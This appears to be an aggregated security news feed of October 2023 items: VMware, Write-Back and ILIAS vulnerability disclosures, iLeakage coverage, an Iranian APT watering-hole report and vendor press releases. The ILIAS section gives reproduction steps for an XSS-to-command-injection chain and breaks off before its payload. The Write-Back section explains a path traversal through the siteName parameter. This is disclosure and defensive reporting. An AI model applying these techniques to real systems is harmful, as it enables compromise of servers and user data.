open-vm-tools contains a file descriptor hijack vulnerability in the vmware-user-suid-wrapper. A malicious actor with non-root privileges may be able to hijack the 
/dev/uinput file descriptor allowing them to simulate user inputs.

Advisory ID: VMSA-2023-0024

CVSSv3 Range: 7.5 - 7.8

Issue Date: 2023-10-26

Updated On: 2023-10-26 (Initial Advisory)

CVE(s): CVE-2023-34057, CVE-2023-34058

Synopsis: VMware Tools updates address Local Privilege Escalation and SAML Token Signature Bypass vulnerabilities (CVE-2023-34057, CVE-2023-34058)

****1\. Impacted Products****

*   VMware Tools

****2\. Introduction****

Multiple vulnerabilities in VMware Tools were responsibly reported to VMware. Updates are available to remediate these vulnerabilities in affected VMware products.

****3a. Local privilege escalation vulnerability in VMware Tools (macOS) (CVE-2023-34057)****

VMware Tools contains a local privilege escalation vulnerability. VMware has evaluated the severity of this issue to be in the Important severity range with a maximum CVSSv3 base score of 7.8.

A malicious actor with local user access to a guest virtual machine may elevate privileges within the virtual machine.

To remediate CVE-2023-34057 apply the patches listed in the 'Fixed Version' column of the 'Response Matrix' found below.

VMware would like to thank Dan Revah of Google for reporting this issue to us.

****3b. SAML Token Signature Bypass vulnerability in VMware Tools (CVE-2023-34058)****

VMware Tools contains a SAML token signature bypass vulnerability. VMware has evaluated the severity of this issue to be in the Important severity range with a maximum CVSSv3 base score of 7.5.

A malicious actor that has been granted Guest Operation Privileges in a target virtual machine may be able to elevate their privileges if that target virtual machine has been assigned a more privileged Guest Alias.

To remediate CVE-2023-34058 apply the patches listed in the 'Fixed Version' column of the 'Response Matrix' found below.

*   While the description and known attack vectors are very similar to CVE-2023-20900, CVE-2023-34058 has a different root cause that has now been addressed.
*   CVE-2023-34058 also impacts open-vm-tools. Fixes have been provided to the Linux community for distribution.

Product

Version

Running On

CVE Identifier

CVSSv3

Severity

Fixed Version

Workarounds

Additional Documentation

VMware Tools

12.x.x, 11.x.x, 10.3.x

macOS

CVE-2023-34057

7.8

important

12.1.1

None

None

VMware Tools

12.x.x, 11.x.x, 10.3.x

Windows

CVE-2023-34057

N/A

N/A

Unaffected

N/A

N/A

VMware Tools

12.x.x, 11.x.x, 10.3.x

macOS

CVE-2023-34058

N/A

N/A

Unaffected

N/A

N/A

VMware Tools

12.x.x, 11.x.x, 10.3.x

Windows

CVE-2023-34058

7.5

important

12.3.5

None

None

****4\. References****

****5\. Change Log****

**2023-10-26 VMSA-2023-0024  
**Initial security advisory.

****6\. Contact****

CVE-2023-34059: VMSA-2023-0024

Xpand IT Write-back manager v2.3.1 allows attackers to perform a directory traversal via modification of the siteName parameter.

During an authorised penetration testing assessment conducted on Xpand IT’s Write-Back software, Balwurk’s security team found multiple security vulnerabilities, first disclosed to the customer and then responsibly submitted to the MITRE CVE program.

The discovered vulnerability allows an attacker to change the directory to which an uploaded file is saved on the filesystem.

This blog post is the second post of a five-part series in which we will technically describe five security vulnerabilities and how they were detected and exploited.

**What is Write-Back?**

Write-Back is a Tableau extension that enables users to submit data directly from a Tableau dashboard to your database, allowing them to implement any actionable use case without leaving the analysis flow.

Write-Back allows users to take the Tableau usage further and implement use cases where you need users to input data, such as forecasting, planning, adding comments, or any actionable process. Includes features like on-premises execution, audit, multiple back-end databases, and integrated authentication.

Before diving into more technical details, we should describe the layout of Write-Back’s high-level back-end architecture:

**Write-Back (Server)**: Tableau extensions are web-based and deployed on a separate application server from the Tableau Server/Cloud. This means that Write-Back should be placed side by side with Tableau, ideally on a separate machine. Users will interact with the Write-Back extension through the Tableau dashboards that can be on different Tableau platforms, i.e., Tableau Desktop, Tableau Server, or even Tableau Cloud.

**Write-Back Manager**: Centralizes all configurations and enables platform administrators to take full control of how Write-Back is configured. All of this is done on a web UI. Each Write-Back installation has its own Write-Back manager deployed on the same machine, allowing it to manage that instance.

**Technical description**

CVE-2023-27170 is a path or directory traversal security vulnerability that allows an authenticated user to upload a file to any location on the file system using any of the multiple file upload features on the Write-Back Manager.

This vulnerability was initially detected by changing the uploaded filename through a man-in-the-middle attack.

In the particular case of the customised logo upload feature, the name under which the logo file would be written to disk equalled the value passed in the siteName parameter, which by default was always 00000000-0000-0000-0000-000000000000. By manipulating the value of this parameter and adding special characters such as dots ‘.’ and slashes ‘/’, an attacker can change the path to which the file will be written:

**_Figure 1 – Logo file upload._**

In this example, the logo was placed in one folder hierarchically above the logos folder:

**_Figure 2 – Logo file uploaded to a different folder._**

The root cause of this vulnerability can be found in the uploadLogoFile function of the ThemesManager class, which handles the upload of a custom logo file:

**_Figure 3 – Cause of the vulnerability._**

The siteName parameter is simply concatenated together with the file extension and added to the writePath, resulting in the manipulation of the folder’s path to which the file is uploaded to.

**Impact**

This vulnerability could potentially be exploited in multiple manners. A malicious user could overwrite critical files, upload massive files, cause a file space denial of service, or upload dangerous files into the web tree to achieve code execution.

**CVE ID:** CVE-2023-27170  
**CVSS 3.1 Base Score:** 5.5  
**CVSS Vector:** AV:N/AC:L/PR:H/UI:N/S:U/C:N/I:H/A:L  
**Affected Vendor:** Xpand IT  
**Affected Product:** Write-Back  
**Affected Version:** Write-Back Manager v2.3.1

**Mitigation**

Update Write-Back to at least version 4.1.

**Timeline**

12-12-2022 – Vulnerability detected and reported to Write-Back.

22-02-2023 – Vulnerability submitted to MITRE.

10-03-2023 – Vulnerability accepted and CVE-2023-27170 reserved.

12-07-2023 – Official Patch released by Write-Back team.

20-10-2023 – Public disclosure of CVE-2023-27170.

**Credits**

**Bruno Pincho** | Penetration Tester at Balwurk 

**References**

*   https://writeback4t.com

CVE-2023-27170: CVE-2023-27170 - Improper Limitation of a Pathname to a Restricted Directory - Balwurk

Categories: Exploits and vulnerabilities
Categories: News
Apple has fixed a bunch of security flaws, but not iLeakage, a side-channel vulnerability in Safari.



(Read more...)




The post Patch...later? Safari iLeakage bug not fixed appeared first on Malwarebytes Labs.

Apple has released updates for its phones, Macs, iPads, watches, and TV streaming devices, fixing a bunch of security problems. But amid all that activity, one fix is notably absent—there is nothing to address the vulnerability dubbed iLeakage.

iLeakage is a side-channel attack that can force the Safari browser to divulge secrets like passwords and Gmail messages.

A side-channel attack looks at the indirect effects of a computer program, or computer hardware, which can reveal things about what's happening under the hood. It's like a thief looking at your house and concluding from the fact that there are no lights on and the car isn't in the driveway that you aren't home. The lights and the empty driveway are side channels.

In the case of iLeakage, the side channel is speculative execution, a performance enhancement feature found in modern CPUs. iLeakage is just the latest in a whole family of speculative execution bugs, known as Spectre, dating back to 2017.

Virtually every modern CPU uses some kind of performance optimization where it attempts to predict what a program will do next. Once a prediction is made, the CPU will execute instructions ahead of time, so that the answer is there immediately should you need it. If the CPU realizes its prediction was wrong it has to revert all the changes it made, but sometimes speculative execution leaves traces in the CPU's microarchitectural state, and especially the cache.

A group of cybersecurity researchers used these traces to show how an attacker can make Safari reveal sensitive information. The attacks use a malicious web page that exploits iLeakage. The page can be used to open Instagram, Gmail, YouTube, or any other website in a new tab. Behind the scenes, the same Safari computer process renders both the malicious page and the target web page, allowing the malicious page to pull information from the target, such as auto-filled passwords, using iLeakage.

Although there are no fixes for iLeakage yet, there are mitigations. Unfortunately, all of them come with significant caveats. According to the researchers, the super-secure Lock Down mode that's available on Apple's Macs, phones, and tablets will disable iLeakage, but Lock Down mode can impact performance and, as Apple points out, "When Lockdown Mode is enabled, your device won’t function like it typically does."

You can also stop iLeakage by disabling JavaScript execution in your browser, but this will likely impact the behavior of every website you visit, making many of them unusable.

There is another mitigation that specifically targets iLeakage, but it's macOS only and it's not enabled by default. On top of that, the mitigation is considered unstable, and it requires users to open a computer terminal window, which will be beyond many users' comfort zones. If you really want to go there, you can read the instructions on the iLeakage site, under "How can I defend against iLeakage." We suggest that unless you're a high value target you probably don't need to bother, and if you are a high value target you should enable Lock Down mode anyway.

There is no evidence that iLeakage has been abused in the wild, and figuring out how the researchers did it will be a significant undertaking for cybercriminals.

**We don’t just report on vulnerabilities—we identify them, and prioritize action.**

Cybersecurity risks should never spread beyond a headline. Keep vulnerabilities in tow by using Malwarebytes Vulnerability and Patch Management.

Patch...later? Safari iLeakage bug not fixed

The newly launched AI & ML Security Library allows developers to analyze the code used in machine learning systems to identify and address risks.

As part of "shift left" to incorporate security discussions earlier in the software development life cycle, organizations are beginning to look at threat modeling to identify security flaws in software design. With developers increasingly incorporating machine learning in their applications, threat modeling is necessary for identifying the risks to the organization.

"People are still grappling with the whole idea that when you use that very new technology \[machine learning\], it brings along a bunch of risk, as well," says Gary McGraw, co-founder of the Berryville Institute of Machine Learning. "I've been in the unenviable position of saying, 'Well, there's this risk, and there's that risk, and the sky is falling,' and everybody goes, 'Well, what am I supposed to do about that?'"

There have been many conversations about machine learning risk, but the difficulty lies in figuring out how to address them, McGraw says. Threat modeling – identifying the types of threats that can cause harm to the organization – helps organizations think through security risks in machine learning systems such as data poisoning, input manipulation, and data extraction. If developers could understand the security flaws in their designs by threat modeling, it would reduce the time spent on security testing during development and before production. NIST's Guidelines on Minimum Standards for Developer Verification of Software recommends threat modeling to look for design-level security issues.

IriusRisk’s threat modeling tool addresses this challenge by automating both threat modeling and architecture risk analysis. Developers and security teams can import the code into the tool to generate diagrams and threat models. Threat modeling templates make threat modeling accessible even to those not familiar with diagramming tools or risk analysis.

And the newly launched AI & ML Security Library allows organizations using IriusRisk to threat model the machine learning system they are planning in order to understand what the security risks are, as well as how to mitigate those risks.

“We're finally getting around to building machinery that people can use to address the risk and control the risk," says McGraw, who is also a member of IriusRisk’s advisory board. "When you put machine learning into your \[system\] design, and you're using IriusRisk, now you know what risks are involved and what to do about that."

**What ML Threat Modeling Looks Like**

IriusRisk's AI & ML Security Library helps organizations ask necessary questions. For example:

1.  Asking where the data being used to train the machine learning model came from. It's important to also ask whether anyone had the opportunity to embed incorrect or malicious data to make the machine do the wrong thing.
2.  Consider how the machine keeps learning once it is in production. Machine learning systems that are online and keep on learning from users are more dangerous than the ones that are not online. "It depends on who is using it. Is it your people? Is it bad people? Is it everybody on Twitter, or X?" McGraw says, noting there have been examples of past projects that had to be taken offline after it learned objectionable information.
3.  Ask if confidential information can be extracted from the machine. If you put confidential information into your machine learning algorithm, it is not protected by cryptographic means and can be extracted. "If you put the data in the machine, it's in the machine," McGraw says. "You need to think about making sure that people using your machine learning system cannot extract that confidential data."

The AI & ML Security Library is based on the BIML ML Security Risk Framework, a taxonomy of machine learning threats, as well as an architectural risk assessment of typical machine learning components developed by McGraw. The framework is designed to be used by developers, engineers, and designers creating applications and services that use machine learning in the early design and development phases of the project. With IriusRisk's library, everybody who is using machine learning can use BIML's framework.

The AI & ML Security Library is available to IriusRisk customers and those using the community edition of the platform.

**Time to Be Threat Modeling**

The AI & ML Security Library was developed in response to interest from organizations about how to analyze and secure AI and ML systems, according to Stephen de Vries, CEO of IriusRisk.

"We have seen a surge in interest from our customers in the finance and technology sectors for guidance on how to analyze, and secure design ML systems," de Vries said in a statement. "Since these are often new projects that are still in the design phase, performing threat modeling here adds a lot of value, because those teams will very quickly understand where the security goalposts are – and what they need to do in order to get there."

The library doesn't help organizations that don't have visibility into their machine learning use. Just as organizations can have shadow IT – where different business stakeholders set up their own servers and Web applications without IT oversight – they can also have shadow machine learning, McGraw says. Different departments are trying out new applications and tools, but there is a gap between what individual employees are using and what risks IT and security teams know about.

“Everybody's like, 'I don't think I have any machine learning in my organization,'" McGraw says. "But as soon as they find out that they do … they find it everywhere.”

Many organizations do not incorporate threat modeling during software design, and those that do rely on manual processes where a person analyzes the threats one at a time.

"If you have a mature threat modeling program and you're using a tool like IriusRisk, you can also now handle machine learning. So the people who are already doing the best are going to do even better," McGraw says. "What about the people who aren't doing threat modeling? Maybe they should start. It's not new. It's time to do it."

IriusRisk Brings Threat Modeling to Machine Learning Systems

**PRESS RELEASE**

**SEATTLE – Oct. 24, 2023 –** WatchGuard® Technologies, a global leader in unified cybersecurity, today announced the launch of WatchGuard MDR, a new 24/7 cybersecurity service purpose-built to make MDR vastly more accessible to managed service providers (MSPs) working to address soaring customer demand for managed cybersecurity delivery. The new service is managed by an elite team of cybersecurity experts and powered by AI. It requires no investment in a traditional security operation center (SOC) infrastructure, advanced technologies, or security experts, which addresses the pressures of scarce cybersecurity professionals and funding faced by MSPs.

“WatchGuard’s new solution has effectively super charged our managed security services business by allowing us to effortlessly tap into the immense potential of MDR and offer it as a value-added service to customers,” said Raul Zayas, president of ZTek Solutions. “By removing the burden on us to create a modern SOC, WatchGuard MDR expedited our ability to give customers what they need the most: top-notch, comprehensive cybersecurity backed by industry-leading cyber experts to ensure a resilient defense against evolving cyber threats. Not only has WatchGuard put us in the fast lane in that regard, they also make it all incredibly simple to do through their Unified Security Platform architecture to help ensure we stay ahead of the curve.”  

Highly customizable and scalable, this new MDR service further strengthens WatchGuard's Unified Security Platform architecture, providing advanced threat detection and response capabilities on top of WatchGuard EDR, EPDR, and Advanced EPDR that empower MSPs to build out robust, comprehensive security offerings for their customers. It comes with the support of WatchGuard’s automated Zero-Trust Application Service, Threat Hunting Service, advanced security analytics, threat intelligence, and a dedicated team of skilled cybersecurity analysts that monitor, detect, and respond to threats 24/7. 

“As a 100% channel-driven company, we wanted to deliver an enterprise-class MDR solution that would allow our MSP partners to expand their business without the expense of building their own SOC or adding to the challenges they already face in finding cybersecurity talent,” said Andrew Young, chief product officer at WatchGuard Technologies. “We are dedicated to supporting our MSP community, and the launch of WatchGuard MDR represents another milestone in the long-term trusted relationships we build with our partners. Not only does this service help MSPs break through existing barriers to entry for delivering managed security services – it allows them to capitalize on a growing opportunity with an innovative new solution we’ve purpose-built for them specifically.” 

**Key Features and Benefits**

WatchGuard MDR is the ideal choice for service providers looking to elevate the security posture of their customers, expand their portfolio, and generate recurring revenue streams with zero investment in modern security operations center (SOC), sophisticated and expensive AI-based technology, and scarce cybersecurity experts. Capabilities include:  

*   **24/7 Endpoint Activity Monitoring and Data Collection –** to provide real-time and retrospective monitoring using event data captured by WatchGuard EPDR or Advanced EPDR in WatchGuard’s modern SOC.
*   **24/7 Proactive Hunting and Detection** – to reduce time to detect and mitigate threats using AI, machine learning, and other advanced techniques to identify indicators of attack, while WatchGuard’s MDR threat hunters search for threats lurking in endpoints.
*   **24/7 Investigation and Validation** – to minimize the impact of potential threats by relying on WatchGuard experts to quickly investigate and accurately validate incidents to determine their nature and severity.
*   **Immediate Incident Notification** – to provide prompt notification with key insights such as affected machines and tactics used when a validated incident occurs so MSPs can take immediate action.
*   **Options for Mitigation and Guidelines for Remediation** – to give MSPs the flexibility to choose the strategy that works best for their business. They can rely on their own team with guidance from WatchGuard experts on how to contain and remove traces of an attack, restore data, patch vulnerabilities, and install additional controls. Or they can outsource the initial response and the containment through endpoint isolation to automated playbooks developed by WatchGuard MDR experts.
*   **Weekly Security Health Status Report and Monthly Activity Reporting** – to build trust with customers by providing regular reports on their security status, which service providers can customize to better engage customers with their MDR service and provide valuable feedback throughout the process.  

For more information about WatchGuard MDR, click here.

**About WatchGuard Technologies, Inc.**

WatchGuard® Technologies, Inc. is a global leader in unified cybersecurity. Our Unified Security Platform® is uniquely designed for managed service providers to deliver world-class security that increases their business scale and velocity while also improving operational efficiency. Trusted by more than 17,000 security resellers and service providers to protect more than 250,000 customers, the company’s award-winning products and services span network security and intelligence, advanced endpoint protection, multi-factor authentication, and secure Wi-Fi. Together, they offer five critical elements of a security platform: comprehensive security, shared knowledge, clarity & control, operational alignment, and automation. The company is headquartered in Seattle, Washington, with offices throughout North America, Europe, Asia Pacific, and Latin America. To learn more, visit WatchGuard.com.

For additional information, promotions and updates, follow WatchGuard on Twitter (@WatchGuard), on Facebook, or on the LinkedIn Company page. Also, visit our InfoSec blog, Secplicity, for real-time information about the latest threats and how to cope with them at www.secplicity.org. Subscribe to The 443 – Security Simplified podcast at Secplicity.org, or wherever you find your favorite podcasts.

WatchGuard Launches MDR Service, Helps MSPs Accelerate Cybersecurity Service Delivery

**PRESS RELEASE**

**SANTA CLARA, Calif.,Oct. 25, 2023/PRNewswire/ --** Malwarebytes, a global leader in real-time cyber protection, today launched an essential new consumer solution, Identity Theft Protection. The new service helps individuals secure their digital identities and defend against identity and online threats. Malwarebytes Identity Theft Protection includes real-time identity monitoring and alerts, robust credit protection and reporting and live agent-supported identity recovery and resolution services – backed by up to a $2 million identity theft insurance policy. The new service, paired with Malwarebytes' award-winning antivirus and VPN software, helps prevent criminals from stealing or using personal information to drain financial accounts, hack or impersonate social media accounts, damage a user's reputation or other online and identity-based attacks.

Today's digital life is complex and sometimes deceptive. According to new research from Malwarebytes, identity theft ranks as people's third biggest concern when it comes to online security, just behind fear of financial accounts and personal data being breached – both of which play into identity theft. Of those surveyed 64% agree that identity theft protection is important, but only 13% have it. Consumers are also increasingly fearful of new technology. Malwarebytes gives consumers protection they can trust, alerting them when we see their information has been stolen and providing live agent support to restore their identity and replace lost items.

"Even as we spend more and more of our lives online, we all know that the internet today can't be trusted," said Mark Beare, GM of Consumer Business Unit, Malwarebytes. "Consumers need a tool that not only blocks threats like malware and phishing, but that also monitors and protects their digital identity, be that social media profiles, bank accounts or email. With Malwarebytes Identity Theft Protection, we provide a robust and exhaustive suite of services so individuals and families can rest easy knowing that we are actively working to keep them safe and protect their digital identity."

Malwarebytes Identity Theft Protection is available globally through a variety of tiered offerings that provide protection via computers and mobile devices across multiple operating systems including Windows, macOS, Android and iOS.

**Key features include:**

*   Identity Monitoring & Alerts**:** Continuously scours a multitude of websites and data sources, including the Dark Web, to alert if personal information is being illegally traded or sold. Recommends actions to take to protect yourself.
*   Credit Monitoring and Protection**:** Ongoing tracking of credit for critical changes, such as new accounts or inquiries and applications for new lines of credit. A credit freeze also can be activated\*.
*   Breach IQ**:** Provides a safety score and alerts if personal information is part of a known breach\*.
*   Identity Recovery & Resolution**:** Assistance in the event of an identity theft incident, including guided steps to report the crime, dispute fraudulent charges, restore identity and recuperate financial losses incurred. Includes up to a $2 million insurance policy.

To read more about the latest threats and cyber protection strategies, visit our blog, or follow us on Facebook, Instagram, LinkedIn, TikTok and Twitter.

_\*U.S. only_

**About Malwarebytes**

Malwarebytes believes that when people and organizations are free from threats, they are free to thrive. Founded in 2008, Malwarebytes CEO Marcin Kleczynski had one mission: to rid the world of malware. Today, Malwarebytes' award-winning endpoint protection, privacy and threat prevention solutions along with a world-class team of threat researchers protect millions of individuals and thousands of businesses across the globe daily. Malwarebytes solutions are consistently recognized by independent tests including AVLAB and AV-TEST. The company is headquartered in California with offices in Europe and Asia. For more information and career opportunities, visit https://www.malwarebytes.com.

Malwarebytes Announces Consumer Identity Theft Protection Solution

An issue in Mintty v.3.6.4 and before allows a remote attacker to execute arbitrary code via crafted commands to the terminal.

CVE-2023-39726: "[31m"?! ANSI Terminal security in 2023 and finding 10 CVEs

Nation-state hackers are using hybrids to ensnare those in the maritime, shipping, and logistics industries.

A threat actor sponsored by the Islamic Republic of Iran has been using watering-hole attacks, with a new malware downloader and a budding new method of infection, against Mediterranean organizations involved in the maritime, shipping, and logistics sectors.

These latest tactics and tools represent in some ways a continuation, and in other ways an evolution, for the group variously known as Tortoiseshell, Imperial Kitten, TA456, Crimson Sandstorm, and Yellow Liderc, according to a blog post this week from PricewaterhouseCoopers. The Islamic Revolutionary Guard Corps-backed threat actor has previously been recorded using watering holes, phishing domains, highly targeted emails, fake social media accounts, and more, in its globe-spanning espionage campaigns.

**Yellow Liderc's Latest Campaign**

Since 2022, Yellow Liderc has been compromising legitimate websites and using them to insert malicious JavaScript. The JavaScript fingerprints unwitting visitors, capturing details such as their location, device, time of visit, and so on. If a visitor matches a specific profile — in this case, entities along the Mediterranean associated with maritime, logistics, and shipping — they will be served further malware.

The malware in question is "IMAPLoader," a dynamic link library (DLL) written in .NET, which uses email as a means of command-and-control (C2) communication.

This new sample is in most ways similar in function to Yellow Liderc's previous loaders. It distinguishes itself, however, in its advanced method of infection: a technique known as "appdomain manager injection." First demonstrated by a proof-of-concept (PoC) called "GhostLoader" in 2020, hackers or red teamers can use it to circumvent tools designed to detect a DLL or executable being loaded onto a Windows machine.

After slyly injecting itself on a host computer deemed of high value, IMAPLoader communicates with the attackers' Russian-hosted, very American-sounding email addresses — leviblum\[@\]yandex.com and brodyheywood\[@\]yandex — where further payloads lie.

**Yellow Liderc's Tactics and Targets Vary**

Anyone who tries to defend against Yellow Liderc simply by accounting for this method of injection, or this malware, will end up falling short. The group has been known to cycle through and combine various tactics, techniques, and procedures over the years.

"What we've seen more often and most recently is reconnaissance emails," says Joshua Miller, senior threat researcher at Proofpoint. Since 2021, he says, it has used the open source red-team tool GoPhish to insert malicious links into fake newsletters impersonating legitimate organizations. But it's also got more, weirder strategies in its arsenal. In 2021, Proofpoint described an elaborate, yearslong ruse they ran, posing as a woman named Marcella Flores, in order to phish a specific employee at an aerospace company.

Recently, Proofpoint observed a unique cluster within the same APT targeting workers and organizations in the healthcare, technology, and the nuclear division of a European energy company. According to PwC, it remains an ongoing threat not just to all of these industries and regions thus far named, but also the automotive, defense, and IT industries, in places as far and wide as the Middle East, South Asia, and North and South America.

Perhaps the only consistent elements of a Yellow Liderc attack are the minor discrepancies between the email sender, newsletter, or website one expects, and the actual sender or experience they're delivered.

"Look for any unusual network traffic," Miller advises, and pay attention to suspicious emails. "Checking who's sending an email is important. I know that we say that all the time, but it's true and important for this sort of case."

Iran APT Targets the Mediterranean With Watering-Hole Attacks

A group of academics has devised a novel side-channel attack dubbed iLeakage that exploits a weakness in the A- and M-series CPUs running on Apple iOS, iPadOS, and macOS devices, enabling the extraction of sensitive information from the Safari web browser.
"An attacker can induce Safari to render an arbitrary webpage, subsequently recovering sensitive information present within it using

Data Security / Vulnerability

A group of academics has devised a novel side-channel attack dubbed **iLeakage** that exploits a weakness in the A- and M-series CPUs running on Apple iOS, iPadOS, and macOS devices, enabling the extraction of sensitive information from the Safari web browser.

"An attacker can induce Safari to render an arbitrary webpage, subsequently recovering sensitive information present within it using speculative execution," researchers Jason Kim, Stephan van Schaik, Daniel Genkin, and Yuval Yarom said in a new study.

In a practical attack scenario, the weakness could be exploited using a malicious web page to recover Gmail inbox content and even recover passwords that are autofilled by credential managers.

iLeakage, besides being the first case of a Spectre-style speculative execution attack against Apple Silicon CPUs, also works against all third-party web browsers available for iOS and iPadOS owing to Apple's App Store policy that mandates browser vendors to use Safari's WebKit engine.

Apple was notified of the findings on September 12, 2022. The shortcoming impacts all Apple devices released from 2020 that are powered by Apple's A-series and M-series ARM processors.

The crux of the problem is rooted in the fact that malicious JavaScript and WebAssembly embedded in a web page in one browser tab can surreptitiously read the content of a target website when a victim visits the attacker-controlled web page.

This is accomplished by means of a microarchitectural side-channel that can be weaponized by a malicious actor to infer sensitive information through other variables like timing, power consumption, or electromagnetic emanations.

The side channel that forms the basis of the latest attack is a performance optimization mechanism in modern CPUs called speculative execution, which has been the target of several such similar methods since Spectre came to light in 2018.

While speculative execution is designed as a way to yield a performance advantage by using spare processing cycles to execute program instructions in an out-of-order fashion when encountering a conditional branch instruction whose direction depends on preceding instructions whose execution is not completed yet.

The cornerstone of this technique is to make a prediction as to the path that the program will follow, and speculatively execute instructions along the path. When the prediction turns out to be correct, the task is completed quicker than it would have taken otherwise.

But when a misprediction occurs, the results of the speculative execution are abandoned and the processor resumes along the correct path. That said, these erroneous predictions leave behind certain traces in the cache.

Attacks like Spectre involve inducing a CPU to speculatively perform operations that would not occur during correct program execution and which leak the victim's confidential information via the side channel.

In other words, by coercing CPUs into mispredicting sensitive instructions, the idea is to enable an attacker (through a rogue program) to access data associated with a different program (i.e., victim), effectively breaking down isolation protections.

iLeakage not only bypasses hardening measures incorporated by Apple, but also implements a timer-less and architecture-agnostic method that leverages race conditions to distinguish individual cache hits from cache misses when two processes -- each associated with the attacker and the target -- run on the same CPU.

This gadget then forms the basis of a covert channel that ultimately achieves an out-of-bounds read anywhere in the address space of Safari's rendering process, resulting in information leakage.

While chances of this vulnerability being used in practical real-world attacks are unlikely owing to the technical expertise required to pull it off, the research underscores the continued threats posed by hardware vulnerabilities even after all these years.

News of iLeakage comes months after cybersecurity researchers revealed details of a trifecta of side-channel attacks – Collide+Power (CVE-2023-20583), Downfall (CVE-2022-40982), and Inception (CVE-2023-20569) – that could be exploited to leak sensitive data from modern CPUs.

It also follows the discovery of RowPress, a variant of the RowHammer attack on DRAM chips and an improvement over BlackSmith that can be used to cause bitflips in adjacent rows, leading to data corruption or theft.

Found this article interesting? Follow us on Twitter __ and LinkedIn to read more exclusive content we post.

iLeakage: New Safari Exploit Impacts Apple iPhones and Macs with A and M-Series CPUs

ILIAS 7.25 (2023-09-12) allows any authenticated user to execute arbitrary operating system commands remotely, when a highly privileged account accesses an XSS payload. The injected commands are executed via the exec() function in the execQuoted() method of the ilUtil class (/Services/Utilities/classes/class.ilUtil.php) This allows attackers to inject malicious commands into the system, potentially compromising the integrity, confidentiality, and availability of the ILIAS installation and the underlying operating system.

Vulnerability

Product

Impact

CVE

OS Command Injection

ILIAS

Kritisch

CVE-2023-45869

**Responsible Disclosure**

⚑ 25. Sep. 2023 - Die Sicherheitslücke wurde entdeckt.  
→ 26. Sep. 2023 - Die Sicherheitslücke wurde an ILIAS gemeldet.  
← 29. Sep. 2023 - ILIAS bestätigt den Erhalt des Reports.  
← 06. Okt. 2023 - ILIAS bestätigt, dass die Sicherheitslücke geschlossen wurde.  
← 23. Okt. 2023 - Patched ILIAS-Release: 8.6, 7.26

**1\. Allgemeine Beschreibung**

Die identifizierte Sicherheitslücke wurde in **ILIAS Version7.25 (2023-09-12 Release)** entdeckt.

Es handelt sich um eine sogenannte OS Command Injection Sicherheitslücke. Dies ist eine Sicherheitslücke, bei der von einem Angreifer übermittelte Befehle auf Betriebssystem-Ebene ausgeführt werden können. In diesem Fall ermöglicht die Schwachstelle einem Angreifer Kommandozeilen-Befehle auszuführen.

Ein Benutzer mit Administratorrechten kann Einstellungen für den PDF-Renderer konfigurieren. Ein Angreifer hat in dieser Komponente potenziell die Möglichkeit Systembefehle einzuschleusen, welche die reguläre Befehlsausführung erweitert. Aufgrund fehlender Eingabeüberprüfung ist es möglich, die Befehlskette beliebig zu erweitern.

Eine bekannte Sicherheitslücke (CVE-2022-45915) könnte hierzu hilfreich sein, da dieselbe Komponente betroffen ist. Der entscheidende Unterschied ist, dass für die Übermittlung einer Payload nicht der Pfad zur Binary wkhtmltopdf selbst, sondern Eingabefelder der Options-Parameter vulnerabel sind.

Besonders kritisch macht diese Schwachstelle, dass sie unter Umständen als normaler User ausgenutzt werden kann. Unter "normal" verstehen wir einen User Account mit den voreingestellten Rechten einer aufgesetzten ILIAS Instanz.

Der folgende PoC und die abschließende Klassifizierung bilden das Worst-Case-Szenario ab. Der Angriff erfolgt durch einen Account mit User-Rechten.

**2\. Proof of Concept (PoC)**

 Your browser does not support the video tag.  
Download video? Here.

**3\. Reproduktion der Schwachstelle****3.1 Reproduktionsschritte (Worst-Case)****Vorabhinweis**

Möchten Sie die Schwachstelle nicht mit dem größtmöglichen Impact, sondern auf einfachem Wege als Administrator reproduzieren, überspringen Sie die folgend aufgeführten Schritte und folgen Sie den Anweisungen unter dem Punkt "_3.2 Reproduktionsschritte (als Admin)_".

**Schritt 1:**

Installieren Sie eine ILIAS-Version7.25 2023-09-12 Instanz auf einem Testsystem. Erstellen Sie neben dem gegebenen Administrator einen weiteren User Account:

1.  "root" (ein Administrator)
2.  "testuser" (ein normaler User, der Angreifer)

**Schritt 2:**

Aktivieren Sie mit dem Administrator-Account unter Administration > Layout und Navigation > Editor > HTML/Javascript erlauben die Checkbox bei Modules/Portfolio: Portfolioseite.

**Schritt 3:**

Loggen Sie sich mit dem **User Account** "testuser" ein.  
Navigieren Sie auf Persönlicher Arbeitsraum > Portfolio und erstellen Sie ein Portfolio mit einer leeren Seite. Bearbeiten Sie die leere Seite und erstellen Sie das Inhaltselement Text einfügen.

Kopieren Sie die folgende Payload in einen Texteditor Ihrer Wahl. Ersetzen Sie die im Data-Attribut ( data-ip) gegebene IP 123.456.78.910 mit **Ihrer öffentlichen IP** (also die IP-Adresse, welche für eine Verbindung zum Webserver verwendet werden soll – z.B. die Ihres PCs).

